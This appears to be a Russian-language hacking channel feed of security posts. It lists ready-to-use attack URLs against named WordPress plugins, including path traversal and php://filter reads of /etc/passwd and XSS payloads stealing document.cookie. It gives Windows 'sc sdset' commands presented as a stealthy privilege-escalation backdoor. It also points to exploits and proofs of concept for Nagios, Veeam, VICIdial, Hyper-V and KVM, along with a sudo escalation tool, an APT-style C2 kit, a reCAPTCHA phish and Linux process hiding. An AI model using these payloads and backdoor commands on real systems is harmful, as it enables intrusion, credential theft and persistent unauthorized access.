Прекрасное в мире плагинов WordPress
*
simple-image-manipulator

/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

activehelper-livehelp

/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cnoscript%3Ealert%28document.cookie%29%3C/noscript%3E&NAME=NAME%22%3E%3Cnoscript%3Ealert%28document.cookie%29%3C/noscript%3E&

amministrazione-aperta

/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

anti-plagiarism

/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E

buddypress-component-stats

/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

dzs-videogallery

/wp-content/plugins/dzs-videogallery/admin/upload.php

e-search

/wp-content/plugins/e-search/tmpl/noscript_az.php?noscript_az=%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E

fancy-product-designer

/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

hd-webplayer

/wp-content/plugins/hd-webplayer/playlist.php

localize-my-post

/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd

SUDO_KILLER
*
Скрипт под:
Сбор учетных данных
Неправильные конфигурации
Опасные двоичные файлы (GTFOBINS)
Уязвимые версии sudo — CVE
Уязвимость Sudo и неправильная конфигурация, связанные с 3dParty
Опасные переменные окружающей среды
Доступные для записи каталоги, в которых есть скрипты
Двоичные файлы, которые можно заменить/переместить
*
Download + много демо + докер для тестов

#sudo

CVE-2024-24401 NAGIOS
*
Authenticated SQL Injection
*
POC exploit

CVE-2024-20017 Zero-Click Exploit Wi-Fi Chipsets
*
CVSS 9.8
*
Отличный разбор:
4 exploits, 1 bug: exploiting cve-2024-20017 4 different ways
*
Сам Exploit

Хакерский митап SPbCTF × Яндекс
*
Где: в питерском офисе Яндекса БЦ Бенуа
Когда: 21 и 22 сентября
*
Расписание и доклады: глянуть тут
*
Что бы прийти ногами или получить линк на онлайн трансляцию - пройти регистрацию ТУТ

#spb #yandex #ctf #hacks #party

Легальный и малозаметный LPE backdoor в WiNd0z
*
Разрешаем удаленное использование Services.msc

sc sdset SCMANAGER D:(A;;CCLCRPRC;;;AU)(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)S:(AU;FA;KA;;;WD)(AU;OIIOFA;GA;;;WD)

sc.exe sdset scmanager D:(A;;KA;;;WD)

#win #backdoor

LoL )))
reCAPTCHA Phish

BEAR-C2
*
Мишка - это компиляция скриптов C2, полезных данных и стейджеров, используемых в симулированных (?) атаках российскими группами APT.

DownLoad

#мишка #C2

CVE-2024-8504 и CVE-2024-8503
*
SQLi and RCE - VICIdial
*
Exploit

CVE-2024-40711 Exploit Veeam backup and Replication
*
WriteUp
*
Pre-Auth exploit

#veeam #rce

А Вы читали библию сегодня ?
*
Malcore Malware Bible

#malware

CVE-2024-38080 Hyper-V 1-Day
*
WriteUp
*
POC exploit

#hyper-v

CVE-2024-23692 RCE
*
Rejetto HTTP File Server
*
exploit

Умели раньше в сплоиты !
*
CVE-1999-1587 - Solaris 8, 9
*

Побег из KVM
*
writeUP - trojan-turtles
*
exploit

Хакер хакера поневоле брат
*
Уязвимости в популярных\opensource СС\С2 фреймворках
*

Скрытие (и раскрытие) процессов Linux
*
*
1. Hiding Linux Processes with Bind Mounts
*
2. The 'Invisibility Cloak' - Slash-Proc Magic

#linux #hacks

CVE-2024-45519
*
SMTP exploit